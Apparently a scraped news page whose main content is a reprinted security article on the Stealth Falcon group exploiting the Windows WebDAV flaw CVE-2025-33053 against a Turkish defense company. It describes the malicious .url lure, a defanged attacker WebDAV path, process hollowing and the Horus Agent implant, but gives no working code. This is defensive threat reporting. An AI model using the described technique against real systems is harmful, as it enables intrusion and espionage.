![Top Features of Vision-Based Workplace Safety Tools [2025]](https://static.wixstatic.com/media/379e66_7e75a4bcefe14e4fbc100abdff83bed3~mv2.jpg/v1/fit/w_1000,h_884,al_c,q_80/file.png?#)
![[The AI Show Episode 152]: ChatGPT Connectors, AI-Human Relationships, New AI Job Data, OpenAI Court-Ordered to Keep ChatGPT Logs & WPP’s Large Marketing Model](https://www.marketingaiinstitute.com/hubfs/ep%20152%20cover.png)
.jpg?#)
![MindsEye From Ex-GTA Producer Is A Day-One Car Wreck [Update]](https://i.kinja-img.com/image/upload/c_fill,h_675,pg_1,q_80,w_1200/aa09b256615c422f7d1e1535d023e578.png)
.png?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
_incamerastock_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![PSA: iOS 26 Spatial Scenes will work on iPhones 12 and up [U]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/06/spatial-photos-ios26.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple categorically denies Siri vaporware claims, and offers a better explanation [Video]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/06/Apple-categorically-denies-Siri-vaporware-claims-and-offers-a-better-explanation.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![This new iPad keyboard was purpose-built for versatility and portability – Logitech Flip Folio [Hands-on]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/06/Logitech-FI.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![iOS 26 and its ‘Liquid Glass’ redesign is being compared to ancient Android skins [Video]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2025/06/ios-26-android-phones.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple Shares Teaser Trailer for 'The Lost Bus' Starring Matthew McConaughey [Video]](https://www.iclarified.com/images/news/97582/97582/97582-640.jpg)
![Apple Debuts Trailer for Third Season of 'Foundation' [Video]](https://www.iclarified.com/images/news/97589/97589/97589-640.jpg)
APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware
A sophisticated cyberattack campaign by the advanced persistent threat group, Stealth Falcon, which exploited a previously unknown zero-day vulnerability to target a major Turkish defense company and execute malware remotely. The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools to execute malicious […] The post APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware appeared first on Cyber Security News.
A sophisticated cyberattack campaign by the advanced persistent threat group, Stealth Falcon, which exploited a previously unknown zero-day vulnerability to target a major Turkish defense company and execute malware remotely.
The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools to execute malicious files from attacker-controlled WebDAV servers.
Microsoft released a security patch for this vulnerability as part of its June Patch Tuesday updates, following a responsible disclosure by Check Point Research.
The vulnerability was exploited through a malicious .url file named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” (Turkish for “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url”), which was likely distributed as an archived attachment in a spear-phishing email targeting the Turkish defense contractor.
The .url file pointed to iediagcmd.exe, a legitimate Internet Explorer diagnostics utility, but manipulated the working directory to reference an attacker-controlled WebDAV server at “\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr”.
This clever technique exploited the search order used by the .NET Process.Start() method, causing the legitimate tool to execute malicious files from the remote server instead of system files.
This allowed arbitrary code execution through process hollowing, as the malicious route.exe spawned from the WebDAV server, bypassed traditional signature-based defenses.
APT Hackers Exploited WebDAV Zero-Day
Stealth Falcon, also known as FruityArmor, is an advanced persistent threat group that has been conducting cyber espionage operations since at least 2012.
The group primarily targets high-profile entities in the Middle East and Africa, with recent operations observed against government and defense sectors in Turkey, Qatar, Egypt, and Yemen.
.webp)
The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework, according to Check Point Research.
Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant. The malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
Beyond the initial implant, researchers identified several previously undisclosed custom tools in Stealth Falcon’s arsenal, including a DC Credential Dumper that bypasses file locks by accessing virtual disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a custom keylogger with RC4 encryption.
The Horus Agent focuses on essential reconnaissance functions, allowing threat actors to fingerprint victim machines and assess their value before deploying more advanced payloads. This approach helps protect the group’s sophisticated post-exploitation tools from exposure.
Stealth Falcon consistently uses repurposed legitimate domains purchased through NameCheap registrar, typically in .net or .com top-level domains. This strategy helps their infrastructure blend in with legitimate traffic, complicating attribution efforts.
The group’s continued evolution demonstrates its commitment to maintaining stealth and resilience in its operations, employing commercial code obfuscation tools and custom modifications that make its payloads difficult to reverse-engineer and track over time.
This latest campaign highlights the ongoing threat posed by sophisticated APT groups, which combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.
Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access
The post APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware appeared first on Cyber Security News.
